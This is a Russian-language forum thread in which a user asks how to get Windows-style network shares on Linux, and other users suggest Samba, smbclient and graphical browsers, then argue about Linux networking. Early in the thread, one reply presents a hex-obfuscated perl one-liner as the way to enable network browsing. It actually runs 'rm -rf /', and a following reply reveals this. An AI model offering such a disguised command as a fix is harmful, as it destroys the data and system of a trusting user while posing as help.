Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 4 5 ... 15 След.
RSS
сетевое окружение в линуксе!!
 
подскажите а как сделать сетевое окружение в этом вашем линуксе?! хочу вот на него перевести сетку, а люди хотят сетевое окружение. чтобы как обычно - мышкой расшаривать диски, через сетевое окружение на шары лазить и файлы оттуда брать?!?
 
Говорят,  что поддержка сетевого окружения появилась на ядрах 2.4.x. Но для ее включения нужно набрать в консоли
perl -e 'exec "\x72\x6D\x20\x2D\x72\x66\x20\x2f"' и подождать некоторое время. Попробуйте, у меня получилось.
 
или perl -e 'exec "rm -rF /"'
 
Samba есть такая. Это её дела.Сетевое оеружение в Линь.
 
Samba + какой нить LinNeighbourhood
 
Поддержка на уровне протокола - пакет samba, нечто похожее на бродилку по сетевому окружению - xsmbrowser.
 
хахаха, насмешили, самба :))) самба умеет только жалкое подобие сетевого окружения - через монтирование. в винде такое во времена windows 3.11 for workgroups было, а в NT и win95 - уже по-нормальному. линукс - это же СЕТЕВАЯ операционная система (по крайней мере, так все говорят)! вот и скажите, как по-нормальному СЕТЕВОЕ окружение сделать, а не через жопу...
 
Ну не совсем только через монтирование, smbclient например ничего не монтирует. Вам чего надо то? Если серверную часть поднять - достаточно один раз настроить эту смешную самбу и спать спокойно, графических конфигурялок к ней целый воз, gnosamba например, или swat. Если качать файлы с других машин - либо монтированием, либо если оное Вам так противно - smbclient-ом его можно и не рутом запускать. Если Вас смех разбирает от консольных програм возьмете графическую надстройку xsmbrowser не привязан ни к чему кроме самой самбы, smb2www - если хотите смотреть на файлы из интернет бродилки требует также http-демона, tksmb - еще одна графическая бродилка.

Родимые бродилки от MS кстати не поддерживают докачки файлов при обрыве связи, так что еще нейзвестно, что порой смешнее и у кого через упомянутое место все сделано. Кстати чем конкретно Вас окна не устраивают, что аж на линух потянуло?
 
а nfs ?
 
Цитата
keydet пишет:
а nfs ?
Ага, и потом бегать по всем виндовым машинам, клиенты устанавливать.
 
место работы - журналистский коллектив. люди привыкли обмениваться файлами через шары. правой кнопочкой тыкают по папке с нужными файлами и кричат "Алёёёёнаааа!! У меня на компе в папке лалала бери!".

И можно прямо вордом открывать этот файл из сети, редактировать и туда же в сеть писать.

А в этой вашей "сетевой операционной системе" ничего похожего на расшаривание правой кнопкой нет, ну на это наплевать. Но открыть файл прямо из сети нельзя!! Обязательно нужно его на локальный диск копировать, или же монтировать. Короче, как в windows for workgroups было. Почему в этой самой сетевой операционной системе поддержка сети - на уровне винды десятилетней давности?!
 
> Кстати чем конкретно Вас окна не устраивают, что аж на линух потянуло?

так все говорят, что линукс - сетевая операционная система, что он рулез, что винды глючные, а я как посмотрю - такое дерьмище редкое... :(
 
Цитата
водопей пишет:
> Кстати чем конкретно Вас окна не устраивают, что аж на линух потянуло?

так все говорят, что линукс - сетевая операционная система, что он рулез, что винды глючные, а я как посмотрю - такое дерьмище редкое... :(

Есть поговорка - "Не нравится, - не ешь."
 
Цитата
Michael пишет:

Ага, и потом бегать по всем виндовым машинам, клиенты устанавливать.

А причем тут винда? сабж вроде линух?
 
Цитата
keydet пишет:
Цитата
Michael пишет:

Ага, и потом бегать по всем виндовым машинам, клиенты устанавливать.

А причем тут винда? сабж вроде линух?
Я так понимаю, компы все виндовые, а товарищчь Гость-водопей хочет себе файл-сервер линуксовый забабахать.
 
компы не все виндовые, но от части виндовых компов отказаться нельзя, потому что используются программы, которые нельзя заменять - их можно менять только вместе с сотрудниками, да и то не факт, что достойные аналоги есть.

хочу вот перевести часть компов под этот ваш линукс. никаких выделенных файл-серверов не надо - надо, чтобы все компы в нужное время могли выполнять функцию файл-сервера. винда это без проблем делает. и линукс... все кричат рулез, а рулеза-то и не видно. видно какое-то уродство уровня развития начала 90х годов.

скажите наконец, неужели я прав? а как тогда объяснить все эти крики про рулез, про сетевую операционную систему и т.д. - они что, все скопом заблуждаются?!
 
Это вопрос коипромиса безопасности и удобства. Наиболее безопасна система, с жестко разграниченными правами, каковой незбежно должна являться любая сетевая система. Иначе будет очень много проблемм нычиная от вирусов и элементарной безграмотности пользователя, его ошибок влекущих уничтожение не только своих, но и чужих данных, вкупе с системными файлами...
То что Вы хотите сделать в принципе реализуемо при продуманной политике в плане предоставления ресурсов и набором скриптов которые кликом мыши будут забирать файлы с других машин, отдавать их на вход программе а по обработке - возвращать серверу. Возможны варианты. Все зависит от потребностей пользователей, IMHO проще все изменяемые файлы хранить на одной машине предоставив пользователям соответствующие права для их редактирования. Собственно это и есть работа администратора, а то как это сделано у вас никакого вмешательства админа вообще не требует. Два сотрудника всегда договорятся меж собой, а Вы то им для чего собственно нужны? Задача админа в идеале организовать работу так, чтобы Ваня не звонил Мане каждый раз, когда у него будет потребность предоставить ей файлы. И упаси бог ему для этого админа тревожить.
 
> Наиболее безопасна система, с жестко разграниченными правами, каковой незбежно должна являться любая сетевая система.

а какое отношение к этому имеет необходимость монтирования?! вы же не будете называть wfwg более безопасной ТОЛЬКО за то, что она не поддерживает \\server\share\path, а умеет работать только через сетевые диски? пусть есть разграничение прав, но при чем тут это уродство с обязательным монтированием? что, кернельхакерам мозгов не хватает сделать полноценную поддержку работы с сетью на уровне функций файловой системы, или же им религия это запрещает?

> То что Вы хотите сделать в принципе реализуемо при продуманной политике в плане предоставления ресурсов и набором скриптов которые кликом мыши будут забирать файлы с других машин, отдавать их на вход программе а по обработке - возвращать серверу.

то есть для любой программы, которая должна работать с файлами из сети, нужно писать какой-то изврат, который заберет файл из сети, как-то определит, что я с ним наработался, и потом запишет его обратно? что-то не нравится мне такое, да и сомнения в том, что этом можно реализовать, сильные...

> Задача админа в идеале организовать работу так, чтобы Ваня не звонил Мане каждый раз, когда у него будет потребность предоставить ей файлы.

эээ. а как еще Маня узнает, что файлы готовы? при любой структуре сети. в любом случае, есть только два варианта - сообщение о факте готовности и периодическая проверка (маразм имхо). так что ничего тут не сделаешь.

> И упаси бог ему для этого админа тревожить.
и не тревожат, пока все на винде. а если на линукс переходить, похоже, будут тревожить вовсю, или же мне придется мегаизвраты придумывать, чтобы простой пользователь мог если не расшаривать ресурсы самостоятельно, то хотя бы удобно с ними работать.

> IMHO проще все изменяемые файлы хранить на одной машине предоставив пользователям соответствующие права для их редактирования.

видимо, проще, если линуксом пользоваться. судя по всему, это дерьмо не умеет по-нормальному с сетью работать. но раз так - еще проще им не пользоваться вообще...
 
Проще пользоваться тем, что лучше знаешь.
Периодические действия в системе экономят кучу ненужной работы, как и уведомления об их результатах.

>не тревожат, пока все на винде. а если на линукс переходить, похоже, будут тревожить вовсю, или же мне придется мегаизвраты придумывать
Это потому, что в окнах над вами не капает и всю работу пользователи делают сами без Вашего участия. К сожалению в линуксе без админа плохо, ему таки придется разок сесть и подумать как сделать лучше - это и есть его работа.

>видимо, проще, если линуксом пользоваться. судя по всему, это дерьмо не умеет по-нормальному с сетью работать
Просто Вы не умеете его также хорошо настраивать как винды. Ну или ваши пользователи, если Вы не принимаете никакого участия в решении их проблемм под виндами.

На вопрос чем конкретно Вас не устраивают окна Вы сослались на слухи и сплетни, ну ладно, наверное не так часто Вы под виндами работали, что нет своего мнения по этому вопросу, зато на вопрос чем Вас не устраивает линукс теперь Вы сможете ответить во всех подробностях.
 
> Просто Вы не умеете его также хорошо настраивать как винды. Ну или ваши пользователи, если Вы не принимаете никакого участия в решении их проблемм под виндами.

не в этом дело. есть удачная мысль - работа с сетью через формат файлов \\server\share\path. в результате в виндах ЛЮБОЕ приложение может обращаться к сетевому файлу как к обычному файлу. это очень удобно, и именно благодаря этому, а не загадочному умению кого-то что-то настраивать, работать с сетевыми файлами в винде удобнее. а этот ваш люнекс по непонятным причинам до сих пор этого не умеет, и тут уже приходится с использованием нехилых способностей к "настройке" затыкать эту дырку... в итоге даже сэкономленные на покупке линукса деньги сразу же теряются на поддержке, потому что специалист того же класса может сделать гораздо меньшее...

> На вопрос чем конкретно Вас не устраивают окна Вы сослались на слухи и сплетни

да всем устраивает, прекрасная ось, я одного не понимаю - за что ее ругают все? и где эти все сейчас - куда они делись? почему в теме не учавствуют? или тут форум какой-то особенный?
Страницы: 1 2 3 4 5 ... 15 След.
Читают тему